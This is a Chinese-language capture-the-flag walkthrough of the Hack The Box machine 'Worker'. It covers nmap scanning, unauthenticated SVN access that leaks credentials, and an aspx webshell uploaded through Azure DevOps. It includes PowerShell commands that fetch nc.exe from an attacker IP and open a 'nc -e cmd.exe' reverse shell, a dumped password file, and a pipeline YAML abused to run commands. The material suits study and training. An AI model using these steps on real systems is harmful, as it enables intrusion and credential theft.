sudo nmap -p- -n --open -v 10.10.10.203
nmap -p 80,3690,5985 -sV -A 10.10.10.203
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
3690/tcp open svnserve Subversion
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
80端口为IIS默认页面,扫目录发现aspnet_client,但访问403
3690端口svn未授权连接成功
svn ls svn://10.10.10.203
svn ls svn://10.10.10.203
得到一个用户名nathen,r2、r4两个版本的信息有点意思
svn checkout svn://10.10.10.203
下载项目到本地,根据项目名和moved.txt中内容,得到两个子域名(都配到hosts里):
dimension.worker.htb
devops.worker.htb
dimension.worker.htb,就是readme里写的html5up做的纯前端项目。根据页面内容,还发现了几个子域名,也是同一套前端模板站。
devops这个子域有http认证,但我们没有账号密码
突破口可能还在历史提交里,先切到r2看看
svn up -r2
nice,得到一组账号密码。使用它成功登录devops.worker.htb,尝试winrm登录失败
Azure DevOps。谷歌搜索,发现流水线可以配置执行命令
修改script(cmd执行的命令)
但是点击运行会提示没有default池的权限。
另找办法,新建一个分支上传aspx webshell
点批准,工作项也是这里现加的
合并完成后,确认master分支里有了。要注意到我们这里默认选到的仓库是spectra(之前提到的dimension里发现的子域名之一)
powershell -c wget 10.10.14.15/nc.exe -outfile \programdata\nc.exe
\programdata\nc.exe -e cmd.exe 10.10.14.15 2333
这个cmdaspx很快就会被删,所以得手速快,或者直接传msf生成的反弹aspx.
c:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is 32D6-9041
Directory of c:\Users
2020-07-07 16:53 <DIR> .
2020-07-07 16:53 <DIR> ..
2020-03-28 14:59 <DIR> .NET v4.5
2020-03-28 14:59 <DIR> .NET v4.5 Classic
2020-08-17 23:33 <DIR> Administrator
2020-03-28 14:01 <DIR> Public
2020-07-22 00:11 <DIR> restorer
2020-07-08 18:22 <DIR> robisl
0 File(s) 0 bytes
8 Dir(s) 10�470�170�624 bytes free
除了管理员还有restorer,robisl两个用户值得关注
where /R c:\ README.txt
想定位一下azure存储的目录在哪儿,但是没找着就很奇怪
看了下wp,发现在c盘之外还有一个盘符
进入w盘在W:\svnrepos\www\conf\passwd文件找到一列密码
### This file is an example password file for svnserve.
### Its format is similar to that of svnserve.conf. As shown in the
### example below it contains one section labelled [users].
### The name and password for each user follow, one account per line.
[users]
nathen = wendel98
nichin = fqerfqerf
nichin = asifhiefh
noahip = player
nuahip = wkjdnw
oakhol = bxwdjhcue
owehol = supersecret
paihol = painfulcode
parhol = gitcommit
pathop = iliketomoveit
pauhor = nowayjose
payhos = icanjive
perhou = elvisisalive
peyhou = ineedvacation
phihou = pokemon
quehub = pickme
quihud = kindasecure
rachul = guesswho
raehun = idontknow
ramhun = thisis
ranhut = getting
rebhyd = rediculous
reeinc = iagree
reeing = tosomepoint
reiing = isthisenough
renipr = dummy
rhiire = users
riairv = canyou
ricisa = seewhich
robish = onesare
robisl = wolves11
robive = andwhich
ronkay = onesare
rubkei = the
rupkel = sheeps
ryakel = imtired
sabken = drjones
samken = aqua
sapket = hamburger
sarkil = friday
这里面正有之前发现的robisl用户,成功winrm登录获取user.txt。但无systeminfo执行权限
evil-winrm -u robisl -p wolves11 -i 10.10.10.203
devops.worker也能登录,有个新项目
发现这个用户可以启动流水线,报错跟之前的nathen不同。先死pool default不存在
把yaml里的pool这行删了试试下,还真跑起来了
在oneline script日志里得到输出
虽然已经读到了root.txt,但还是拿一下shell
修改流水线yaml如下,多行script里下载nc并反弹shell——流水线会一直卡在这
# Starter pipeline
# Start with a minimal pipeline that you can customize to build and deploy your code.
# Add steps that build, run tests, deploy, and more:
# https://aka.ms/yaml
trigger:
- master
steps:
- script: type C:\Users\Administrator\Desktop\root.txt
displayName: 'Run a one-line script'
- script: |
powershell -c wget 10.10.14.15/nc.exe -outfile c:\programdata\nc.exe
c:\programdata\nc.exe -e cmd.exe 10.10.14.15 2333
displayName: 'get reverse shell'
看文章,在拿到初始的IIS权限shell后可以通过roguepotato提权到system
此处可能存在不合适展示的内容,页面不予展示。您可通过相关编辑功能自查并修改。
如您确认内容无涉及 不当用语 / 纯广告导流 / 暴力 / 低俗色情 / 侵权 / 盗版 / 虚假 / 无价值内容或违法国家有关法律法规的内容,可点击提交进行申诉,我们将尽快为您处理。